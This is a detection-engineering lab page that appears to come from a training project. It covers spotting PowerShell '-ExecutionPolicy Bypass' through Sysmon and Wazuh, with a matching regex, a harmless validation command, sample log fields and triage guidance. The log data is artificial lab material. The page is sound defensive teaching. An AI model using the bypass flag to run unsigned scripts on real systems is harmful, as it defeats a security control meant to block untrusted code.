Phase 1·T1059.001·Easy
Detecting -ExecutionPolicy Bypass
Catch attempts to neutralize ExecutionPolicy from the command line.
#Windows#PowerShell
Detection Objective
Alert on -ExecutionPolicy Bypass/Unrestricted in process command lines.
Real-World Attack Scenario
Attackers force-disable script policy to run unsigned payloads.
Why This Detection Matters
Ubiquitous in malicious scripts, infrequent in clean environments.
ATT&CK Mapping
T1059.001 · PowerShell
Tactic: Execution
Required Telemetry
- SysmonEID 1
Windows Event IDs
4688
Sysmon Event IDs
1
Wazuh Log Source
Sysmon/Operational
Setup Steps
- Enable Sysmon EID 1 with command line.
Safe Validation Command
Run a harmless script with bypass.
powershell.exe -ExecutionPolicy Bypass -Command "Write-Host detection-test"⚠ lab use only · this project does not execute real malware
Expected Log Output
Sysmon EID 1
CommandLine: powershell.exe -ExecutionPolicy Bypass -Command ...Detection Logic (Wazuh rule concept)
CommandLine matches /(?i)-ex(ecutionpolicy)?\s+(bypass|unrestricted)/False Positives
- Vendor installers
Tuning Recommendations
- Allowlist signed installers and known IT scripts.
Analyst Triage Notes
- Inspect script payload and parent.
Detection Improvement Ideas
- Correlate with file-write events for new .ps1 files.
log analysis layer
Detection is not complete until the logs prove what happened. The sections below show the telemetry produced by the validation above, how to read it like an analyst, and why this pattern matters.
siem · log evidence
rule 100639
Detecting -ExecutionPolicy Bypass
Sysmon/Operational
Event ID
Sysmon EID 1
Image
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent
C:\Windows\explorer.exe
CommandLine
powershell.exe -ExecutionPolicy Bypass -Command "Write-Host detection-test"
User
CORP\j.doe
Agent
WIN10-LAB-01
Timestamp
2026-05-26T14:32:11Z
analyst note
Inspect script payload and parent.
Parent → Child Analysis
explorer.exe → powershell.exe — review whether this lineage is expected for WIN10-LAB-01 and user CORP\j.doe.
Command-Line Flags Observed
- -ExecutionPolicy BypassNeutralizes script-policy controls so unsigned code can run.
Parsed Fields the Analyst Reads
- Image — Process binary that executed — confirms PowerShell.C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
- ParentImage — Who launched it — context for legitimacy.C:\Windows\explorer.exe
- CommandLine — Arguments — where attacker intent shows up.powershell.exe -ExecutionPolicy Bypass -Command "Write-Host detection-test"
- User — Account context — service vs interactive vs SYSTEM.CORP\j.doe
- EventID — Telemetry channel and event type.Sysmon EID 1
- Wazuh Rule ID — Rule that matched and produced this alert.100639
- Agent — Endpoint that produced the telemetry.WIN10-LAB-01
- Timestamp — When it happened — anchor for correlation.2026-05-26T14:32:11Z
Malicious Pattern
pattern
-ExecutionPolicy Bypass
description
Attackers force-disable script policy to run unsigned payloads.
analyst takeaway
Ubiquitous in malicious scripts, infrequent in clean environments. Treat this signal as higher-risk when combined with suspicious parents, hidden windows, download cradles, or unusual user context.
proof the detection worked
test command
powershell.exe -ExecutionPolicy Bypass -Command "Write-Host detection-test"expected event
Sysmon EID 1 on WIN10-LAB-01 with Image=powershell.exe and the validation command above in CommandLine.
expected wazuh alert
Wazuh rule 100639 — "Detecting -ExecutionPolicy Bypass" fires at a level matching severity=medium.
confirming log fields
ImageParentImageCommandLineUserEventID
analyst interpretation
The recorded fields satisfy every clause of the detection logic. Parent process, user context, and command-line arguments together prove the behavior was observed end to end.
conclusion
Detection succeeded: telemetry was captured, the rule matched, and the alert reached the analyst with enough context to triage.